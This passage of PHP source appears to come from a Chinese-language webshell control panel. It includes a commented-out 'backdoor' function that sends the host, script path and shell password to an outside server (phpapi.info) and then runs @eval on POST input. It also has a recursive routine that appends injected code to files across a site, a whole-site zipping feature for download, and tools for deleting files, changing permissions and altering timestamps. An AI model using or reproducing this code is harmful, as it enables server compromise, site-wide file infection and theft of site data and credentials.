923 $url = $apitoken . $apiname . '&value=' . $apivalue.$apikey;
924 GetHtml($url);
925 echo "<meta http-equiv='refresh' content='0'>";
926}*/
927
928//后门No.1
929/*function show_mainp()
930{
931 $domain = $_SERVER ['HTTP_HOST'];
932 //判断$dimain是否为内网ip
933 if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
934 $indexhtmls="200 OK";
935 } else {
936
937 @set_time_limit(10);
938 $apiname = urlencode($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
939 $apivalue = urlencode(postpass);
940 $apitoken = "http://phpapi.info/api.php?name="; //后门地址
941 $apikey = "&id=" . urlencode(get_proxy_ip());
942 $url = $apitoken . $apiname . '&value=' . $apivalue.$apikey;
943 GetHtml($url);
944 }
945 @eval($_POST[postpass]);
946 exit;
947}*/
948
949//递归遍历目录,预定义了一些操作
950function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell)
951{
952 $show = do_show($dir);
953 if ($show===1) {
954 return 0;
955 }
956 foreach ($show as $files) {
957 if (is_dir($files) && $bool) {
958 do_passreturn($files, $code, $type, $bool, $filetype, $shell);
959 } else {
960 if ($files == $shell) {
961 continue;
962 }
963 switch ($type) {
964 case "guama":
965 if (debug($files, $filetype)) {
966 do_write($files, "ab", "\n" . $code) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
967 }
968 break;
969 case "qingma":
970 $filecode = @implode('', @file($files));
971 if (stristr($filecode, $code)) {
972 $newcode = str_replace($code, '', $filecode);
973 do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
974 }
975 break;
976 case "tihuan":
977 $filecode = @implode('', @file($files));
978 if (stristr($filecode, $code)) {
979 $newcode = str_replace($code, $filetype, $filecode);
980 do_write($files, "wb", $newcode) ? html_n("成功--> " . $files . "<br>") : html_n("失败--> " . $files . "<br>");
981 }
982 break;
983 case "scanfile":
984 $file = explode('/', $files);
985 if (stristr($file[count($file) - 1], $code)) {
986 html_a("?eanver=editr&p=" . $files, $files);
987 echo '<br>';
988 }
989 break;
990 case "scancode":
991 $filecode = @implode('', @file($files));
992 if (stristr($filecode, $code)) {
993 html_a("?eanver=editr&p=" . $files, $files);
994 echo '<br>';
995 }
996 break;
997 case "scanphp":
998 $fileinfo = pathinfo($files);
999 if (@$fileinfo['extension'] == $code) {
1000 $filecode = @implode('', @file($files));
1001 if (muma($filecode, $code)) {
1002 html_a("?eanver=editr&p=" . urlencode($files), "编辑");
1003 html_a("?eanver=del&p=" . urlencode($files), "删除");
1004 echo $files . '<br>';
1005 }
1006 }
1007 break;
1008 }
1009 }
1010 }
1011}
1012
1013//打包整个网站(应该是www下所有文件
1014class PHPzip
1015{
1016 public $file_count = 0;
1017 public $datastr_len = 0;
1018 public $dirstr_len = 0;
1019 public $filedata = '';
1020 public $gzfilename;
1021 public $fp;
1022 public $dirstr = '';
1023
1024 //时间处理
1025 public function unix2DosTime($unixtime = 0)
1026 {
1027 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1028
1029 if ($timearray['year'] < 1980) {
1030 $timearray['year'] = 1980;
1031 $timearray['mon'] = 1;
1032 $timearray['mday'] = 1;
1033 $timearray['hours'] = 0;
1034 $timearray['minutes'] = 0;
1035 $timearray['seconds'] = 0;
1036 }
1037
1038 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
1039 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1040 }
1041
1042 public function startfile($path = 'wwwroot.zip')
1043 {
1044 $this->gzfilename = $path;
1045 if ($this->fp = @fopen($this->gzfilename, "w")) {
1046 return true;
1047 }
1048 return false;
1049 }
1050
1051 public function addfile($data, $name)
1052 {
1053 $name = str_replace('\\', '/', $name);
1054
1055 if (strrchr($name, '/') == '/') {
1056 return $this->adddir($name);
1057 }
1058
1059 $dtime = dechex($this->unix2DosTime());
1060 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1061 eval('$hexdtime = "' . $hexdtime . '";');
1062 $unc_len = strlen($data);
1063 $crc = crc32($data);
1064 $zdata = gzcompress($data);
1065 $c_len = strlen($zdata);
1066 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1067
1068 $datastr = "\x50\x4b\x03\x04";
1069 $datastr .= "\x14\x00";
1070 $datastr .= "\x00\x00";
1071 $datastr .= "\x08\x00";
1072 $datastr .= $hexdtime;
1073 $datastr .= pack('V', $crc);
1074 $datastr .= pack('V', $c_len);
1075 $datastr .= pack('V', $unc_len);
1076 $datastr .= pack('v', strlen($name));
1077 $datastr .= pack('v', 0);
1078 $datastr .= $name;
1079 $datastr .= $zdata;
1080 $datastr .= pack('V', $crc);
1081 $datastr .= pack('V', $c_len);
1082 $datastr .= pack('V', $unc_len);
1083
1084
1085 fwrite($this->fp, $datastr);
1086 $my_datastr_len = strlen($datastr);
1087 unset($datastr);
1088
1089 $dirstr = "\x50\x4b\x01\x02";
1090 $dirstr .= "\x00\x00";
1091 $dirstr .= "\x14\x00";
1092 $dirstr .= "\x00\x00";
1093 $dirstr .= "\x08\x00";
1094 $dirstr .= $hexdtime;
1095 $dirstr .= pack('V', $crc);
1096 $dirstr .= pack('V', $c_len);
1097 $dirstr .= pack('V', $unc_len);
1098 $dirstr .= pack('v', strlen($name));
1099 $dirstr .= pack('v', 0);
1100 $dirstr .= pack('v', 0);
1101 $dirstr .= pack('v', 0);
1102 $dirstr .= pack('v', 0);
1103 $dirstr .= pack('V', 32);
1104 $dirstr .= pack('V', $this->datastr_len);
1105 $dirstr .= $name;
1106
1107 $this->dirstr .= $dirstr;
1108
1109 $this->file_count++;
1110 $this->dirstr_len += strlen($dirstr);
1111 $this->datastr_len += $my_datastr_len;
1112 }
1113
1114 public function adddir($name)
1115 {
1116 $name = str_replace("\\", "/", $name);
1117 $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
1118
1119 $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
1120 $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0);
1121
1122 fwrite($this->fp, $datastr);
1123 $my_datastr_len = strlen($datastr);
1124 unset($datastr);
1125
1126 $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
1127 $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
1128 $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . pack("v", 0);
1129 $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name;
1130
1131 $this->dirstr .= $dirstr;
1132
1133 $this->file_count++;
1134 $this->dirstr_len += strlen($dirstr);
1135 $this->datastr_len += $my_datastr_len;
1136 }
1137
1138 public function createfile()
1139 {
1140 $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
1141 pack('v', $this->file_count) .
1142 pack('v', $this->file_count) .
1143 pack('V', $this->dirstr_len) .
1144 pack('V', $this->datastr_len) .
1145 "\x00\x00";
1146
1147 fwrite($this->fp, $this->dirstr . $endstr);
1148 fclose($this->fp);
1149 }
1150}
1151
1152//压缩并打包文件的类
1153class eanver
1154{
1155 public $out = '';
1156
1157 //当使用 new 操作符创建一个类的实例时,构造方法将会自动调用
1158 public function __construct($dir)
1159 {
1160 if (@function_exists('gzcompress')) {
1161 if (count($dir) > 0) {
1162 foreach ($dir as $file) {
1163 if (is_file($file)) {
1164 $filecode = implode('', @file($file));
1165 if (is_array($dir)) {
1166 $file = basename($file);
1167 } //返回路径中的文件名部分
1168 $this->filezip($filecode, $file);
1169 }
1170 }
1171 $this->out = $this->packfile();
1172 }
1173 return true;
1174 } else {
1175 return false;
1176 }
1177 }
1178
1179 public $datasec = array();
1180 public $ctrl_dir = array();
1181 public $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1182 public $old_offset = 0;
1183
1184 //获得系统时间
1185 public function at($atunix = 0)
1186 {
1187 $unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
1188 if ($unixarr['year'] < 1980) {
1189 $unixarr['year'] = 1980;
1190 $unixarr['mon'] = 1;
1191 $unixarr['mday'] = 1;
1192 $unixarr['hours'] = 0;
1193 $unixarr['minutes'] = 0;
1194 $unixarr['seconds'] = 0;
1195 }
1196 return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
1197 ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
1198 }
1199
1200 //压缩文件
1201 public function filezip($data, $name, $time = 0)
1202 {
1203 $name = str_replace('\\', '/', $name);
1204 $dtime = dechex($this->at($time));
1205 $hexdtime = '\x' . $dtime[6] . $dtime[7]
1206 . '\x' . $dtime[4] . $dtime[5]
1207 . '\x' . $dtime[2] . $dtime[3]
1208 . '\x' . $dtime[0] . $dtime[1];
1209 eval('$hexdtime = "' . $hexdtime . '";');
1210 $fr = "\x50\x4b\x03\x04";
1211 $fr .= "\x14\x00";
1212 $fr .= "\x00\x00";
1213 $fr .= "\x08\x00";
1214 $fr .= $hexdtime;
1215 $unc_len = strlen($data);
1216 $crc = crc32($data);
1217 $zdata = gzcompress($data);
1218 $c_len = strlen($zdata);
1219 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1220 $fr .= pack('V', $crc);
1221 $fr .= pack('V', $c_len);
1222 $fr .= pack('V', $unc_len);
1223 $fr .= pack('v', strlen($name));
1224 $fr .= pack('v', 0);
1225 $fr .= $name;
1226 $fr .= $zdata;
1227 $fr .= pack('V', $crc);
1228 $fr .= pack('V', $c_len);
1229 $fr .= pack('V', $unc_len);
1230 $this->datasec[] = $fr;
1231 $new_offset = strlen(implode('', $this->datasec));
1232 $cdrec = "\x50\x4b\x01\x02";
1233 $cdrec .= "\x00\x00";
1234 $cdrec .= "\x14\x00";
1235 $cdrec .= "\x00\x00";
1236 $cdrec .= "\x08\x00";
1237 $cdrec .= $hexdtime;
1238 $cdrec .= pack('V', $crc);
1239 $cdrec .= pack('V', $c_len);
1240 $cdrec .= pack('V', $unc_len);
1241 $cdrec .= pack('v', strlen($name));
1242 $cdrec .= pack('v', 0);
1243 $cdrec .= pack('v', 0);
1244 $cdrec .= pack('v', 0);
1245 $cdrec .= pack('v', 0);
1246 $cdrec .= pack('V', 32);
1247 $cdrec .= pack('V', $this->old_offset);
1248 $this->old_offset = $new_offset;
1249 $cdrec .= $name;
1250 $this->ctrl_dir[] = $cdrec;
1251 }
1252
1253 //打包文件
1254 public function packfile()
1255 {
1256 $data = implode('', $this->datasec);
1257 $ctrldir = implode('', $this->ctrl_dir);
1258 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1259 }
1260}
1261
1262//zip的一个类,用于解压zip
1263class zip
1264{
1265 public $total_files = 0;
1266 public $total_folders = 0;
1267
1268 public function Extract($zn, $to, $index = array(-1))
1269 {
1270 $ok = 0;
1271 $zip = @fopen($zn, 'rb');
1272 if (!$zip) {
1273 return (-1);
1274 }
1275 $cdir = $this->ReadCentralDir($zip, $zn);
1276 $pos_entry = $cdir['offset'];
1277
1278 if (!is_array($index)) {
1279 $index = array($index);
1280 }
1281 for ($i = 0; $index[$i]; $i++) {
1282 if (intval($index[$i]) != $index[$i] || $index[$i] > $cdir['entries']) {
1283 return (-1);
1284 }
1285 }
1286 for ($i = 0; $i < $cdir['entries']; $i++) {
1287 @fseek($zip, $pos_entry);
1288 $header = $this->ReadCentralFileHeaders($zip);
1289 $header['index'] = $i;
1290 $pos_entry = ftell($zip);
1291 @rewind($zip);
1292 fseek($zip, $header['offset']);
1293 if (in_array("-1", $index) || in_array($i, $index)) {
1294 $stat[$header['filename']] = $this->ExtractFile($header, $to, $zip);
1295 }
1296 }
1297 fclose($zip);
1298 return $stat;
1299 }
1300
1301 public function ReadFileHeader($zip)
1302 {
1303 $binary_data = fread($zip, 30);
1304 $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
1305
1306 $header['filename'] = fread($zip, $data['filename_len']);
1307 if ($data['extra_len'] != 0) {
1308 $header['extra'] = fread($zip, $data['extra_len']);
1309 } else {
1310 $header['extra'] = '';
1311 }
1312
1313 $header['compression'] = $data['compression'];
1314 $header['size'] = $data['size'];
1315 $header['compressed_size'] = $data['compressed_size'];
1316 $header['crc'] = $data['crc'];
1317 $header['flag'] = $data['flag'];
1318 $header['mdate'] = $data['mdate'];
1319 $header['mtime'] = $data['mtime'];
1320
1321 if ($header['mdate'] && $header['mtime']) {
1322 $hour = ($header['mtime'] & 0xF800) >> 11;
1323 $minute = ($header['mtime'] & 0x07E0) >> 5;
1324 $seconde = ($header['mtime'] & 0x001F) * 2;
1325 $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
1326 $month = ($header['mdate'] & 0x01E0) >> 5;
1327 $day = $header['mdate'] & 0x001F;
1328 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
1329 } else {
1330 $header['mtime'] = time();
1331 }
1332
1333 $header['stored_filename'] = $header['filename'];
1334 $header['status'] = "ok";
1335 return $header;
1336 }
1337
1338 public function ReadCentralFileHeaders($zip)
1339 {
1340 $binary_data = fread($zip, 46);
1341 $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
1342
1343 if ($header['filename_len'] != 0) {
1344 $header['filename'] = fread($zip, $header['filename_len']);
1345 } else {
1346 $header['filename'] = '';
1347 }
1348
1349 if ($header['extra_len'] != 0) {
1350 $header['extra'] = fread($zip, $header['extra_len']);
1351 } else {
1352 $header['extra'] = '';
1353 }
1354
1355 if ($header['comment_len'] != 0) {
1356 $header['comment'] = fread($zip, $header['comment_len']);
1357 } else {
1358 $header['comment'] = '';
1359 }
1360
1361 if ($header['mdate'] && $header['mtime']) {
1362 $hour = ($header['mtime'] & 0xF800) >> 11;
1363 $minute = ($header['mtime'] & 0x07E0) >> 5;
1364 $seconde = ($header['mtime'] & 0x001F) * 2;
1365 $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
1366 $month = ($header['mdate'] & 0x01E0) >> 5;
1367 $day = $header['mdate'] & 0x001F;
1368 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
1369 } else {
1370 $header['mtime'] = time();
1371 }
1372 $header['stored_filename'] = $header['filename'];
1373 $header['status'] = 'ok';
1374 if (substr($header['filename'], -1) == '/') {
1375 $header['external'] = 0x41FF0010;
1376 }
1377 return $header;
1378 }
1379
1380 public function ReadCentralDir($zip, $zip_name)
1381 {
1382 $size = filesize($zip_name);
1383
1384 if ($size < 277) {
1385 $maximum_size = $size;
1386 } else {
1387 $maximum_size = 277;
1388 }
1389
1390 @fseek($zip, $size - $maximum_size);
1391 $pos = ftell($zip);
1392 $bytes = 0x00000000;
1393
1394 while ($pos < $size) {
1395 $byte = @fread($zip, 1);
1396 $bytes = ($bytes << 8) | ord($byte);
1397 if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506) {
1398 $pos++;
1399 break;
1400 }
1401 $pos++;
1402 }
1403
1404 $fdata = fread($zip, 18);
1405
1406 $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size', $fdata);
1407
1408 if ($data['comment_size'] != 0) {
1409 $centd['comment'] = fread($zip, $data['comment_size']);
1410 } else {
1411 $centd['comment'] = '';
1412 }
1413 $centd['entries'] = $data['entries'];
1414 $centd['disk_entries'] = $data['disk_entries'];
1415 $centd['offset'] = $data['offset'];
1416 $centd['disk_start'] = $data['disk_start'];
1417 $centd['size'] = $data['size'];
1418 $centd['disk'] = $data['disk'];
1419 return $centd;
1420 }
1421
1422 public function ExtractFile($header, $to, $zip)
1423 {
1424 $header = $this->readfileheader($zip);
1425
1426 if (substr($to, -1) != "/") {
1427 $to .= "/";
1428 }
1429 if ($to == './') {
1430 $to = '';
1431 }
1432 $pth = explode("/", $to . $header['filename']);
1433 $mydir = '';
1434 for ($i = 0; $i < count($pth) - 1; $i++) {
1435 if (!$pth[$i]) {
1436 continue;
1437 }
1438 $mydir .= $pth[$i] . "/";
1439 if ((!is_dir($mydir) && @mkdir($mydir, 0777)) || (($mydir == $to . $header['filename'] || ($mydir == $to && $this->total_folders == 0)) && is_dir($mydir))) {
1440 @chmod($mydir, 0777);
1441 $this->total_folders++;
1442 echo "DIR: $mydir<br>";
1443 }
1444 }
1445
1446 if (strrchr($header['filename'], '/') == '/') {
1447 return;
1448 }
1449
1450 if (!($header['external'] == 0x41FF0010) && !($header['external'] == 16)) {
1451 if ($header['compression'] == 0) {
1452 $fp = @fopen($to . $header['filename'], 'wb');
1453 if (!$fp) {
1454 return (-1);
1455 }
1456 $size = $header['compressed_size'];
1457
1458 while ($size != 0) {
1459 $read_size = ($size < 2048 ? $size : 2048);
1460 $buffer = fread($zip, $read_size);
1461 $binary_data = pack('a' . $read_size, $buffer);
1462 @fwrite($fp, $binary_data, $read_size);
1463 $size -= $read_size;
1464 }
1465 fclose($fp);
1466 touch($to . $header['filename'], $header['mtime']);
1467 } else {
1468 $fp = @fopen($to . $header['filename'] . '.gz', 'wb');
1469 if (!$fp) {
1470 return (-1);
1471 }
1472 $binary_data = pack(
1473 'va1a1Va1a1',
1474 0x8b1f,
1475 Chr($header['compression']),
1476 Chr(0x00),
1477 time(),
1478 Chr(0x00),
1479 Chr(3)
1480 );
1481
1482 fwrite($fp, $binary_data, 10);
1483 $size = $header['compressed_size'];
1484
1485 while ($size != 0) {
1486 $read_size = ($size < 1024 ? $size : 1024);
1487 $buffer = fread($zip, $read_size);
1488 $binary_data = pack('a' . $read_size, $buffer);
1489 @fwrite($fp, $binary_data, $read_size);
1490 $size -= $read_size;
1491 }
1492
1493 $binary_data = pack('VV', $header['crc'], $header['size']);
1494 fwrite($fp, $binary_data, 8);
1495 fclose($fp);
1496
1497 $gzp = @gzopen($to . $header['filename'] . '.gz', 'rb') or die("Cette archive est compress");
1498 if (!$gzp) {
1499 return (-2);
1500 }
1501 $fp = @fopen($to . $header['filename'], 'wb');
1502 if (!$fp) {
1503 return (-1);
1504 }
1505 $size = $header['size'];
1506
1507 while ($size != 0) {
1508 $read_size = ($size < 2048 ? $size : 2048);
1509 $buffer = gzread($gzp, $read_size);
1510 $binary_data = pack('a' . $read_size, $buffer);
1511 @fwrite($fp, $binary_data, $read_size);
1512 $size -= $read_size;
1513 }
1514 fclose($fp);
1515 gzclose($gzp);
1516
1517 touch($to . $header['filename'], $header['mtime']);
1518 @unlink($to . $header['filename'] . '.gz');
1519 }
1520 }
1521
1522 $this->total_files++;
1523 echo "FILE: $to$header[filename]<br>";
1524 return true;
1525 }
1526}
1527
1528//解压文件
1529function start_unzip($tt, $tmp_name, $new_name, $todir = 'zipfile')
1530{
1531 if ($tt == '1') {
1532 $z = new Zip;
1533 $have_zip_file = 0;
1534 $upfile = array("tmp_name" => $tmp_name, "name" => $new_name);
1535 if (is_file($upfile[tmp_name])) {
1536 $have_zip_file = 1;
1537 echo "<br>正在解压: " . $upfile[name] . "<br><br>";
1538 if (preg_match('/\.zip$/mis', $upfile[name])) {
1539 $result = $z->Extract($upfile[tmp_name], $todir);
1540 if ($result == -1) {
1541 echo "<br>文件 " . $upfile[name] . " 错误.<br>";
1542 }
1543 echo "<br>完成,共建立 " . $z->total_folders . " 个目录," . $z->total_files . " 个文件.<br><br><br>";
1544 } else {
1545 echo "<br>" . $upfile[name] . " 不是 zip 文件.<br><br>";
1546 }
1547 if (realpath($upfile[name]) != realpath($upfile[tmp_name])) {
1548 @unlink($upfile[name]);
1549 rename($upfile[tmp_name], $upfile[name]);
1550 }
1551 }
1552 } elseif ($tt == '2') {
1553 $zip = new ZipArchive();
1554 if ($zip->open($tmp_name) !== true) {
1555 echo "抱歉!压缩包无法打开或损坏";
1556 }
1557 $zip->extractTo($todir);
1558 $zip->close();
1559 } elseif ($tt == '3') {
1560 $phar = new PharData($tmp_name);
1561 $phar->extractTo($todir, null, true);
1562 }
1563 echo '解压完毕! <a href="?eanver=main&path=' . urlencode($todir) . '">进入解压目录</a> <a href="javascript:history.go(-1);">返回</a>';
1564}
1565
1566//递归列出文件
1567function listfiles($dir = ".", $faisunZIP, $mydir)
1568{
1569 $sub_file_num = 0;
1570 if (is_file($mydir . "$dir")) {
1571 if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir")) {
1572 $faisunZIP->addfile(file_get_contents($mydir . $dir), "$dir");
1573 return 1;
1574 }
1575 return 0;
1576 }
1577
1578 $handle = opendir($mydir . "$dir");
1579 while ($file = readdir($handle)) {
1580 if ($file == "." || $file == "..") {
1581 continue;
1582 }
1583 if (is_dir($mydir . "$dir/$file")) {
1584 $sub_file_num += listfiles("$dir/$file", $faisunZIP, $mydir);
1585 } else {
1586 if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir/$file")) {
1587 $faisunZIP->addfile(file_get_contents($mydir . $dir . "/" . $file), "$dir/$file");
1588 $sub_file_num++;
1589 }
1590 }
1591 }
1592 closedir($handle);
1593 if (!$sub_file_num) {
1594 $faisunZIP->addfile("", "$dir/");
1595 }
1596 return $sub_file_num;
1597}
1598
1599//压缩文件时使用的列出文件大小函数
1600function num_bitunit($num)
1601{
1602 $bitunit = array(' B', ' KB', ' MB', ' GB');
1603 for ($key = 0; $key < count($bitunit); $key++) {
1604 if ($num >= pow(2, 10 * $key) - 1) {
1605 $num_bitunit_str = (ceil($num / pow(2, 10 * $key) * 100) / 100) . " $bitunit[$key]";
1606 }
1607 }
1608 return $num_bitunit_str;
1609}
1610
1611//对文件的一些操作
1612function File_Act($array, $actall, $inver)
1613{
1614 if (($count = count($array)) == 0) {
1615 return "请选择文件";
1616 }
1617 if ($actall == 'e') {
1618 $mydir = $_GET['path'] . '/';
1619 $inver = urldecode($inver);
1620 if (is_array($array)) {
1621 $faisunZIP = new PHPzip;
1622 if ($faisunZIP->startfile("$inver")) {
1623 $filenum = 0;
1624 foreach ($array as $file) {
1625 $filenum += listfiles($file, $faisunZIP, $mydir);
1626 }
1627 $faisunZIP->createfile();
1628 return "压缩完成,共添加 " . $filenum . " 个文件.<br><a href='" . $inver . "'>点击下载 " . $inver . " (" . num_bitunit(filesize("$inver")) . ")</a>";
1629 } else {
1630 return $inver . " 不能写入,请检查路径或权限是否正确.<br>";
1631 }
1632 } else {
1633 return "没有选择的文件或目录.<br>";
1634 }
1635 }
1636 $i = 0;
1637 while ($i < $count) {
1638 $array[$i] = urldecode($array[$i]);
1639 switch ($actall) {
1640 case "a":
1641 $inver = urldecode($inver);
1642 if (!is_dir($inver)) {
1643 return "路径错误";
1644 }
1645 $filename = array_pop(explode('/', $array[$i]));
1646 $suc = @copy($array[$i], File_Str($inver . '/' . $filename)) ? "成功" : "失败";
1647 $msg = "复制到" . $inver . "目录" . $suc;
1648 break;
1649 case "b":
1650 $para_type = 1;
1651 if (is_dir($array[$i])) {
1652 $para_type = 2;
1653 }
1654 delDirAndFile($array[$i]);
1655 if ($para_type == 1) {
1656 $suc = !is_file($array[$i]) ? "成功" : "失败";
1657 } elseif ($para_type == 2) {
1658 $suc = !is_dir($array[$i]) ? "成功" : "失败";
1659 }
1660 $msg = "删除" . $suc;
1661 break;
1662 case "c":
1663 if (!preg_match("/^[0-7]{4}$/", $inver)) {
1664 return "属性值错误";
1665 }
1666 $newmode = base_convert($inver, 8, 10);
1667 $suc = @chmod($array[$i], $newmode) ? "成功" : "失败";
1668 $msg = "属性修改为" . $inver . $suc;
1669 break;
1670 case "d":
1671 $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
1672 if ($suc == "失败") {
1673 @chmod($array[$i], 0666);
1674 $suc = @touch($array[$i], strtotime($inver)) ? "成功" : "失败";
1675 }
1676 $msg = "时间修改为" . $inver . $suc;
1677 break;
1678 }
1679 $i++;
1680 }
1681 return "所选文件" . $msg;
1682}
1683
1684//base64实现
1685function html_base()
1686{
1687 $str = <<<end
1688function base64encode(str){
1689 var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
1690 var out, i, len;
1691 var c1, c2, c3;
1692 len = str.length;
1693 i = 0;
1694 out = "";
1695 while (i < len) {
1696 c1 = str.charCodeAt(i++) & 0xff;
1697 if (i == len) {
1698 out += base64EncodeChars.charAt(c1 >> 2);
1699 out += base64EncodeChars.charAt((c1 & 0x3) << 4);
1700 out += "==";
1701 break;
1702 }
1703 c2 = str.charCodeAt(i++);
1704 if (i == len) {
1705 out += base64EncodeChars.charAt(c1 >> 2);
1706 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
1707 out += base64EncodeChars.charAt((c2 & 0xF) << 2);
1708 out += "=";
1709 break;
1710 }
1711 c3 = str.charCodeAt(i++);
1712 out += base64EncodeChars.charAt(c1 >> 2);
1713 out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
1714 out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
1715 out += base64EncodeChars.charAt(c3 & 0x3F);
1716 }
1717 return out;
1718}
1719function utf16to8(str) {
1720var out, i, len, c;
1721out = "";
1722len = str.length;
1723for(i = 0; i < len; i++) {
1724c = str.charCodeAt(i);
1725if ((c >= 0x0001) && (c <= 0x007F)) {
1726out += str.charAt(i);
1727} else if (c > 0x07FF) {
1728out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
1729out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
1730out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
1731} else {
1732out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
1733out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
1734}
1735}
1736return out;
1737}
1738function utf8to16(str) {
1739 var out, i, len, c;
1740 var char2, char3;
1741 out = "";
1742 len = str.length;
1743 i = 0;
1744 while(i < len) {
1745 c = str.charCodeAt(i++);
1746 switch(c >> 4) {
1747 case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
1748 out += str.charAt(i-1);
1749 break;
1750 case 12: case 13:
1751 char2 = str.charCodeAt(i++);
1752 out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
1753 break;
1754 case 14:
1755 char2 = str.charCodeAt(i++);
1756 char3 = str.charCodeAt(i++);
1757 out += String.fromCharCode(((c & 0x0F) << 12) |
1758 ((char2 & 0x3F) << 6) |
1759 ((char3 & 0x3F) << 0));
1760 break;
1761 }
1762 }
1763 return out;
1764}
1765end;
1766 html_n($str);
1767}
1768
1769//获得ip
1770function get_proxy_ip()
1771{
1772 $arr_ip_header = array(
1773 'HTTP_CDN_SRC_IP',
1774 'HTTP_PROXY_CLIENT_IP',
1775 'HTTP_WL_PROXY_CLIENT_IP',
1776 'HTTP_CLIENT_IP',
1777 'HTTP_X_FORWARDED_FOR',
1778 'REMOTE_ADDR',
1779 );
1780 $client_ip = 'unknown';
1781 //分别用$arr_ip_header中的变量获得ip,若不为空且不为unknow则返回
1782 foreach ($arr_ip_header as $key) {
1783 if (!empty($_SERVER[$key]) && strtolower($_SERVER[$key]) != 'unknown') {
1784 $client_ip = $_SERVER[$key];
1785 break;
1786 }
1787 }
1788 return $client_ip;
1789}
1790
1791//main html
1792function html_main()
1793{
1794 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
1795 $hsafemode = "ON (开启)";
1796 } else {
1797 $hsafemode = "OFF (关闭)";
1798 }
1799 $Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
1800 $Server_OS = PHP_OS;
1801 $Server_Soft = $_SERVER["SERVER_SOFTWARE"];
1802 $web_server = php_uname();
1803 $title = $_SERVER["HTTP_HOST"] . "__Manage";
1804 html_n("<html><title>" . $title . "</title><table width='100%'><td align='center'><b>安全模式:{$hsafemode}-----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server}</b></td></table>");
1805 html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'></iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'></iframe></td></tr></table></html>");
1806}
1807
1808//刷新页面
1809function refresh_page()
1810{
1811 $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
1812 $url = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];
1813 print <<<END
1814<script type="text/javascript">
1815window.parent.location.href="{$url}";
1816</script>
1817END;
1818}
1819
1820//是否登陆
1821function islogin()
1822{
1823 if (count($_GET) > 0) { //unknown
1824 refresh_page();
1825 die();
1826 }
1827 $title = $_SERVER["HTTP_HOST"] . "__Login";
1828
1829 //初始界面
1830 $str = <<<end
1831<html>
1832<head>
